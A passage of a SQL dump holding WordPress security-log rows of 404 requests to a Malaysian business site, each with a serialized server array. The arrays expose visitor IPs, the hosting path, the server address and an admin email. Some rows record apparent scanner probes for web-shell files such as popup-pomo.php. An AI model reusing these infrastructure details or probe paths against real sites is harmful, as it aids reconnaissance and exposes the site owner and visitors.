EQUEST_TIME\";s:10:\"1570431658\";}}','notice','2019-10-07 07:01:01','2019-10-07 07:00:59',35395032,37201312,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.115'),(27623,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/blog/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:28:\"https://bintara.com.my/blog/\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrgurctZvnRcEsjCpc25gAAAIs\";s:12:\"REDIRECT_URL\";s:6:\"/blog/\";s:11:\"REMOTE_ADDR\";s:13:\"95.143.218.78\";s:11:\"REMOTE_PORT\";s:5:\"58213\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrgurctZvnRcEsjCpc25gAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570431162.7731\";s:12:\"REQUEST_TIME\";s:10:\"1570431162\";}}','notice','2019-10-07 06:52:45','2019-10-07 06:52:43',35423608,37232048,'https://bintara.com.my/blog/',1,0,'95.143.218.78'),(27622,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:81:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/permalink/popup-pomo.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"216-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"216-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"216-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"216-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZrTcsAZj7RBQ-icbk-MwwAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZrTcsAZj7RBQ-icbk-MwwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrTcsAZj7RBQ-icbk-MwwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"209.124.75.158\";s:11:\"REMOTE_PORT\";s:5:\"38656\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:10:\"SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrTcsAZj7RBQ-icbk-MwwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570427762.8979\";s:12:\"REQUEST_TIME\";s:10:\"1570427762\";}}','notice','2019-10-07 05:56:04','2019-10-07 05:56:03',35068664,36881464,'https://bintara.com.my/permalink/popup-pomo.php',1,0,'209.124.75.158'),(27621,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:81:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/permalink/popup-pomo.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"20-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZrTbE1o81Ms4j7YQaMpswAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZrTbE1o81Ms4j7YQaMpswAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrTbE1o81Ms4j7YQaMpswAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"209.124.75.158\";s:11:\"REMOTE_PORT\";s:5:\"37534\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/permalink/popup-pomo.php\";s:10:\"SCRIPT_URL\";s:25:\"/permalink/popup-pomo.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrTbE1o81Ms4j7YQaMpswAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570427756.6437\";s:12:\"REQUEST_TIME\";s:10:\"1570427756\";}}','notice','2019-10-07 05:55:59','2019-10-07 05:55:57',35458648,37264848,'https://bintara.com.my/permalink/popup-pomo.php',1,0,'209.124.75.158'),(27620,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/send-quote-teamviewer/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrRunKWq-OQ7bMwJVXJ5AAAAVU\";s:12:\"REDIRECT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.12\";s:11:\"REMOTE_PORT\";s:4:\"4501\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:10:\"SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrRunKWq-OQ7bMwJVXJ5AAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570427322.6299\";s:12:\"REQUEST_TIME\";s:10:\"1570427322\";}}','notice','2019-10-07 05:48:45','2019-10-07 05:48:43',34388800,36177216,'https://bintara.com.my/send-quote-teamviewer/',1,0,'207.46.13.12'),(27619,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/uploads.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/uploads.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/uploads.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZrCpk1o81Ms4j7YQaMnJAAAAAA\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/uploads.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/uploads.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrCpk1o81Ms4j7YQaMnJAAAAAA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"185.17.41.25\";s:11:\"REMOTE_PORT\";s:5:\"46696\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/uploads.php\";s:10:\"SCRIPT_URL\";s:12:\"/uploads.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrCpk1o81Ms4j7YQaMnJAAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570423463.0278\";s:12:\"REQUEST_TIME\";s:10:\"1570423463\";}}','notice','2019-10-07 04:44:26','2019-10-07 04:44:23',35434488,37234168,'https://bintara.com.my/uploads.php',1,0,'185.17.41.25'),(27618,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"61A24EA4-F78A-441F-82EB-CB9657A33F2F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZq@8VB148AIihBft5NJlQAAAEA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.118.115\";s:11:\"REMOTE_PORT\";s:5:\"49451\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZq@8VB148AIihBft5NJlQAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570422513.1544\";s:12:\"REQUEST_TIME\";s:10:\"1570422513\";}}','notice','2019-10-07 04:28:36','2019-10-07 04:28:33',35886048,37690560,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.115'),(27617,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"49257\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s